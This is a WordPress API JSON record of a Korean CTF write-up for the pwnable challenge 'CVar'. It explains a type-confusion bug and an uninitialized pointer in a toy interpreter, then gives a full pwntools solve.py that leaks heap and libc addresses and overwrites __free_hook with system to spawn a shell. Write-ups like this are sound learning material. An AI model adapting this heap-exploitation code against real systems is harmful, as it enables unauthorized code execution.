{"id":285,"date":"2019-06-21T17:57:27","date_gmt":"2019-06-21T08:57:27","guid":{"rendered":"http:\/\/ipwn.kr\/?p=285"},"modified":"2022-02-12T01:17:54","modified_gmt":"2022-02-11T16:17:54","slug":"rootctf-cvar","status":"publish","type":"post","link":"http:\/\/ipwn.kr\/index.php\/2019\/06\/21\/rootctf-cvar\/","title":{"rendered":"[RootCTF] CVar"},"content":{"rendered":"<h1>CVar<\/h1>\n<hr>\n<p>\ubb38\uc81c \uc9c4\uc9dc \ubd84\uc11d\ud558\uae30\ub3c4 \uc5b4\ub835\uace0 \ud480\uae30\ub3c4 \uc5b4\ub835\uace0 \uc9c4\uc9dc \uc774\ub984\uac12\ud55c\ub2e4 \ucd5c\uc801\ud654 \ud55c \ubb38\uc81c\ub3c4 \uc544\ub2cc\ub370 \ucd5c\uc801\ud654 \ud55c \uac83 \ub9c8\ub0e5 \ubd84\uc11d\ub3c4 \uc5b4\ub835\uace0&#8230; \uc554\ud2bc \ud480\uc5c8\uc73c\ub2c8 write-up\uc744 \uc368\uc57c\uaca0\ub2e4.<\/p>\n<h2>Mitigation<\/h2>\n<hr>\n<ul>\n<li><span style=\"color:green\">Relro   : Full Rerlo<\/span><\/li>\n<li><span style=\"color:green\">Stack   : Canary<\/span><\/li>\n<li><span style=\"color:green\">NX  : NX enable<\/span><\/li>\n<li><span style=\"color:green\">PIE : PIE enable<\/span><\/li>\n<\/ul>\n<p>\ud480 \ubbf8\ud2f0\uac8c\uc774\uc158\uc774 \uac78\ub824\uc788\ub2e4. \uc0ac\uc2e4 \uc774\uac8c \ud070 \ub09c\uad00\uc740 \uc544\ub2c8\ub2e4. libc leak \ud560 \ub54c\ub3c4 \uadf8\ub807\uace0 \ubb50&#8230;<br \/>\npie\ub791 relro\uac00 \uaebc\uc838\uc788\uc5c8\ub2e4\uba74 \uc880 \ub354 \uc26c\uc6e0\uc744\uc9c0\ub3c4 \ubaa8\ub974\uaca0\uc9c0\ub9cc \ubbf8\ud2f0\uac8c\uc774\uc158\uc740 \ud06c\uac8c \uc0c1\uad00 \uc5c6\uc744\ub4ef.<\/p>\n<h2>Analyzing<\/h2>\n<hr>\n<p>CTF\ub54c\ub77c\uba74 \ucde8\uc57d\uc810\ub9cc \uc788\ub294 \ubd80\ubd84 \ub300\ucda9 \ucc3e\uc73c\ub824 \ud588\uaca0\uc9c0\ub9cc \uc2dc\uac04\ub3c4 \ub9ce\uc774 \uc788\uace0,<br \/>\n\ud0c0\uc784\uc5b4\ud0dd\uc2dd\uc73c\ub85c \ubb38\uc81c \ud478\ub294 \uac78 \uc2eb\uc5b4\ud574\uc11c \uc804\ubd80 \ub2e4 \ubd84\uc11d\ud588\ub2e4. \uadf8\ub798\uc11c \ubd84\uc11d\ud558\ub294\ub370 \ub300\ucda9 6\uc2dc\uac04 \ub118\uac8c \uac78\ub9b0 \uac83 \uac19\ub2e4.<\/p>\n<h3>Intro<\/h3>\n<hr>\n<ol>\n<li>\ubc30\uc5f4, \uc815\uc218(int)\ud0c0\uc785, string\ud0c0\uc785 \uc774\ub807\uac8c \uad6c\ud604.<\/li>\n<li>int \ud0c0\uc785 \ubcc0\uc218\uc5d0 string \ud0c0\uc785 \ubcc0\uc218\ub97c \ub123\uc5b4\uc8fc\uba74 type check\ud558\ub294 \uac12\uc744 \uc548 \ubc14\uafd4\uc90c.<\/li>\n<li>array \ub9cc\ub4e4 \ub54c next array\ub97c \uac00\ub974\ud0a4\ub294 \ubd80\ubd84\uc744 0\uc73c\ub85c \ucd08\uae30\ud654 \ud558\uc9c0 \uc54a\uc74c -> uaf\ub85c \uc8fc\uc791 \uac00\ub2a5<\/li>\n<\/ol>\n<p>\ub300\ucda9 \uc774 \uc138 \uac1c\ub9cc \uc54c\uace0 \ud480\uba74 \ub418\ub294\ub370 3\ubc88\uc9f8 \uc800 \ucde8\uc57d\uc810 \ucc3e\ub294\uac8c \uc740\uadfc \uc5b4\ub824\uc6e0\ub2e4. \uacb0\uad6d \uc190\ud37c\uc9d5\uc73c\ub85c \ucc3e\uc544\ub0c4 \u314e\u314b\u314b<\/p>\n<p><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/i.loli.net\/2019\/06\/21\/5d0c96f30f06681178.png\" title=\"CVar type unchange\"><img decoding=\"async\" src=\"https:\/\/i.loli.net\/2019\/06\/21\/5d0c96f30f06681178.png\" alt=\"CVar type unchange\" title=\"CVar type unchange\" \/><\/a><\/p>\n<p>\uc774 \ubd80\ubd84\uc774 \ub300\ucda9 int\ud615 \ubcc0\uc218\uc5d0\ub2e4\uac00 string\ubcc0\uc218 \uc9d1\uc5b4\ub123\uc744 \ub54c type \uc548 \ubc14\uafd4\uc8fc\ub294 \uacf3\uc774\uace0.<\/p>\n<p><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/i.loli.net\/2019\/06\/21\/5d0c97a16c94e72029.png\" title=\"Uninitialized_pointer\"><img decoding=\"async\" src=\"https:\/\/i.loli.net\/2019\/06\/21\/5d0c97a16c94e72029.png\" alt=\"Uninitialized_pointer\" title=\"Uninitialized_pointer\" \/><\/a><\/p>\n<p>\uc774 \ubd80\ubd80\ubd84\uc774 next array \ucd08\uae30\ud654 \uc548 \ud574\uc8fc\ub294 \ubd80\ubd84\uc778\ub370 \uc74c \uadf8\ub807\ub2e4 \ubd84\uc11d\ud558\uae30 \uc9c4\uc9dc \uc5b4\ub824\uc6e0\ub2e4.<\/p>\n<h3>Scenario<\/h3>\n<hr>\n<p>\ucde8\uc57d\uc810 \uc138 \uac00\uc9c0\ub97c \ucc3e\uc544\ub0b8 \ud6c4\uc5d0\ub3c4 exploit \uc2dc\ub098\ub9ac\uc624 \uc0dd\uac01\ud558\ub294\ub370\ub3c4 \ud070 \uc2dc\uac04\uc744 \uc3df\uc558\ub2e4. \uc544\uc9c1 \ubd80\uc871\ud568 \ucc9c\uc9c0\uc778\ub4ef.<\/p>\n<h4>Heap leak<\/h4>\n<hr>\n<ol>\n<li>var a = 1 \uac19\uc774 \uac4d int\ud615 \ubcc0\uc218 \uc120\uc5b8<\/li>\n<li>var b = &#8220;&#8221; \uac19\uc774 string\ud615 \ubcc0\uc218 \uc120\uc5b8<\/li>\n<li>a = b\ub85c \uac12 \ub123\uc5b4\uc8fc\uba74 b\uc758 \ubb38\uc790\uc5f4 \uc8fc\uc19f\uac12\uc774 \uc22b\uc790 \uc801\ud788\ub294 \uacf3\uc5d0 \uc801\ud798<\/li>\n<li>\uadfc\ub370 a\ubcc0\uc218\uc758 type\uc740 int\ud615 \uadf8\ub300\ub85c \ub0a8\uc544\uc788\uc5b4\uc11c \uc8fc\uc19f\uac12\uc774 leak\ub428 (heap leak)<\/li>\n<\/ol>\n<h4>Libc leak<\/h4>\n<hr>\n<ol>\n<li>string\uc744 \uac81\ub098 \ud06c\uac8c \ub9cc\ub4e4\uc5b4\uc8fc\uba74\uc11c Fake array\ub97c \uc0dd\uc131\ud568<\/li>\n<li>string free\ud558\uace0 unsorted bin \ubcf4\ub0c4<\/li>\n<li>\ub2e4\uc2dc array \uc0dd\uc131\ud558\uba74 fake array\ub97c \ub530\ub77c\uac00\uba74\uc11c libc leak<\/li>\n<\/ol>\n<h4>Exploit<\/h4>\n<hr>\n<ol>\n<li>\ub2e4 leak\ud588\uc73c\uba74 \uc774\uc804\uc5d0 free\ub41c \ud799\ub4e4 \ub2e4 \ud560\ub2f9\ud574\uc11c \uacf5\uac04 \uba54\uafd4\uc90c<\/li>\n<li>\ub2e4\uc2dc string\ubcc0\uc218\ub85c Fake array \uc0dd\uc131<\/li>\n<li>free\ud558\uc9c0 \uc54a\uace0 \ub2e4\ub978 string\ub4e4 \ub354 \uc0dd\uc131<\/li>\n<li>fake array\ucabd\uc5d0\uc11c oob? \uac19\uc740 \ub290\ub08c\uc73c\ub85c \ub2e4\ub978 \uccad\ud06c\ub4e4 \ub36e\uc744 \uc218 \uc788\uc74c<\/li>\n<li>string\ub4e4\uc758 len\uc744 \ub36e\uc5b4\uc11c aaw \ub9cc\ub4e4\uace0 free hook -> system<\/li>\n<li>\/bin\/sh\uc774\ub77c\ub294 \uc774\ub984\uc758 \ubcc0\uc218 \uc9c0\uc6cc\uc8fc\uba74 shell<del><\/del><\/li>\n<\/ol>\n<p>\uc2dc\ub098\ub9ac\uc624\ub294 \ub300\ucda9 \uc774\ub7f0 \ub290\ub08c\uc774\uc5c8\ub358 \uac83 \uac19\ub2e4.<\/p>\n<h2>solve.py<\/h2>\n<pre><code class=\"language-python \">from pwn import *\n\ne = ELF('.\/CVar')\nlibc = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6')\np = process(e.path)\n\nsla = p.sendlineafter\nsa = p.sendafter\nnum_type = 0x440\nstr_type = 0x4a0\narr_element_type = 0x650\nfake = 0x740\nname = 0x5d0\nstr_fake = 0x780\nlib = 0x710\n\ndelete = lambda name:sla('&gt; ', 'delete ' + name)\nview = lambda name:sla('&gt; ', name)\nassign = lambda name1, name2:sla('&gt; ', '{0}={1}'.format(name1, name2))\n\ndef new_var(name, val, mode):\n\n    if mode == 'str':\n        sla('&gt; ', 'var {0}=\"{1}\"'.format(name, val))\n\n    elif mode == 'num':\n        sla('&gt; ', 'var {0}={1}'.format(name, val))\n\n    elif mode == 'array':\n        sla('&gt; ', 'var {0}=new array{1}'.format(name, val))\n\ndef array_assign(name, dimen, val, mode):\n    if mode == 'num':\n        sla('&gt; ', '{0}{1}={2}'.format(name,dimen,val))\n\n    elif mode == 'str':\n        sla('&gt; ', '{0}{1}=\"{2}\"'.format(name, dimen, val))\n\n\nnew_var('\/bin\/sh', 1234, 'num')\nnew_var('b', 'ipwnipwnipwn', 'str')\nassign('\/bin\/sh', 'b')\nview('\/bin\/sh')\np.recvuntil('\/bin\/sh[')\nheap_base = int(p.recvuntil(']')[:-1]) - 0x590\nlog.info('heap : 0x%x'%heap_base)\n\nnum_type += heap_base\nstr_type += heap_base\narr_element_type += heap_base\nfake += heap_base\nname += heap_base\nstr_fake += heap_base\nlib += heap_base\n\nfake_arr = ''.ljust(0x70, '\\x00')\nfake_arr += p64(fake)\nfake_arr = fake_arr.ljust(0x130, '\\x00')\nfake_arr += p64(arr_element_type) + p64(0x1) + p64(0) + p64(str_fake)\nfake_arr = fake_arr.ljust(0x170, '\\x00')\nfake_arr += p64(str_type) + p64(name) + p64(lib) + p64(8)\nfake_arr = fake_arr.ljust(0x200, '\\x00')\n\nnew_var('c', fake_arr, 'str') \ndelete('c')\nnew_var('d', '[1][4]', 'array')\n\nview('d')\np.recvuntil('d[')\nlibc_base = u64(p.recv(6) + '\\x00\\x00') - 0x3c4b78\nsystem = libc_base + libc.sym['system']\ntarget = libc_base + 0x3c67a8\nlog.info('libc_base : 0x%x'%libc_base)\n\nfor i in range(8):\n    view('\/bin\/sh')\n\nfake_arr = p64(arr_element_type) + p64(0x10009) + p64(0)\n\nnew_var('e', fake_arr, 'str')\nfake = 0x8d0 + heap_base\n\nnew_var('f', 'ipwn', 'str')\nnew_var('g', 'ipwn', 'str')\n\nnew_var('h', '\\x00'*0x70 + p64(fake) + '\\x00'*0x188, 'str')\ndelete('h')\nnew_var('i', '[1][4]', 'array')\narray_assign('i', '[0][0][6]', 'ipwn', 'str')\n\npay = p64(heap_base + 0x650) + p64(0x10009)\npay += p64(0)*3 + p64(0x31)\npay += p64(heap_base + 0x890) + p64(heap_base + 0x8b0)\npay += p64(target) + p64(0xffff)\n\nassign('e', '\"' + pay + '\"')\nassign('e', '\"' + p64(system) + '\"')\n\ndelete('\/bin\/sh')\np.interactive()\n<\/code><\/pre>\n<h2>\ud6c4\uae30<\/h2>\n<hr>\n<p>\ud480\uba74\uc11c \uc9c4\uc9dc \ud654\ub098\uba74\uc11c \uc7ac\ubc0c\uac8c &#8230;\u314e\u314e&#8230;. \ud480\uc5c8\ub2e4 \uc774\uc81c \uc870\uae08\uc774\ub098\ub9c8 \ubd84\uc11d \uc2e4\ub825\uc774 \ub298\uc9c0 \uc54a\uc744\uae4c ?? \u314e\u314e \ub531\ud788 \ud799\ud2b8\ub9ad\uc774 \uc788\ub358 \uac83\ub3c4 \uc544\ub2c8\uace0 \uac4d \ubd84\uc11d \uc798 \ud574\uc11c \ud799 \uc5b4\ub5bb\uac8c \ub418\ub294\uc9c0\ub9cc \uc798 \uc54c\uc544\ub0b4\uba74 \ub418\ub294 \ubb38\uc81c\uc600\ub2e4! \uadf8\ub7f0 \uac78 \uc0dd\uac01\ud574\ubcf4\uba74 \uaf64\ub098 \uc624\ub798 \uc7a1\uc740 \ubb38\uc81c\uc778\ub4ef<\/p>\n<p>\ubc14\uc774\ub108\ub9ac\ub294 \ud5c8\ub77d \ub9e1\uace0 \uc5c5\ub85c\ub4dc\ud569\ub2c8\ub2e4 \u314e\u314e<br \/>\n<a href=\"http:\/\/ipwn.kr\/binary\/CVar\">CVar<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>CVar \ubb38\uc81c \uc9c4\uc9dc \ubd84\uc11d\ud558\uae30\ub3c4 \uc5b4\ub835\uace0 \ud480\uae30\ub3c4 \uc5b4\ub835\uace0 \uc9c4\uc9dc \uc774\ub984\uac12\ud55c\ub2e4 \ucd5c\uc801\ud654 \ud55c \ubb38\uc81c\ub3c4 \uc544\ub2cc\ub370 \ucd5c\uc801\ud654 \ud55c \uac83 \ub9c8\ub0e5 \ubd84\uc11d\ub3c4 \uc5b4\ub835\uace0&#8230; \uc554\ud2bc \ud480\uc5c8\uc73c\ub2c8 write-up\uc744 \uc368\uc57c\uaca0\ub2e4. Mitigation Relro : Full Rerlo Stack : Canary NX : NX enable PIE : PIE enable \ud480 \ubbf8\ud2f0\uac8c\uc774\uc158\uc774 \uac78\ub824\uc788\ub2e4. \uc0ac\uc2e4 \uc774\uac8c \ud070 \ub09c\uad00\uc740 \uc544\ub2c8\ub2e4. libc leak \ud560 \ub54c\ub3c4 \uadf8\ub807\uace0 \ubb50&#8230; pie\ub791 relro\uac00&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,11],"tags":[],"class_list":["post-285","post","type-post","status-publish","format-standard","hentry","category-http-ipwn-kr-blog-pwnable","category-writep-up"],"_links":{"self":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts\/285"}],"collection":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/comments?post=285"}],"version-history":[{"count":62,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts\/285\/revisions"}],"predecessor-version":[{"id":926,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts\/285\/revisions\/926"}],"wp:attachment":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/media?parent=285"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/categories?post=285"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/tags?post=285"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}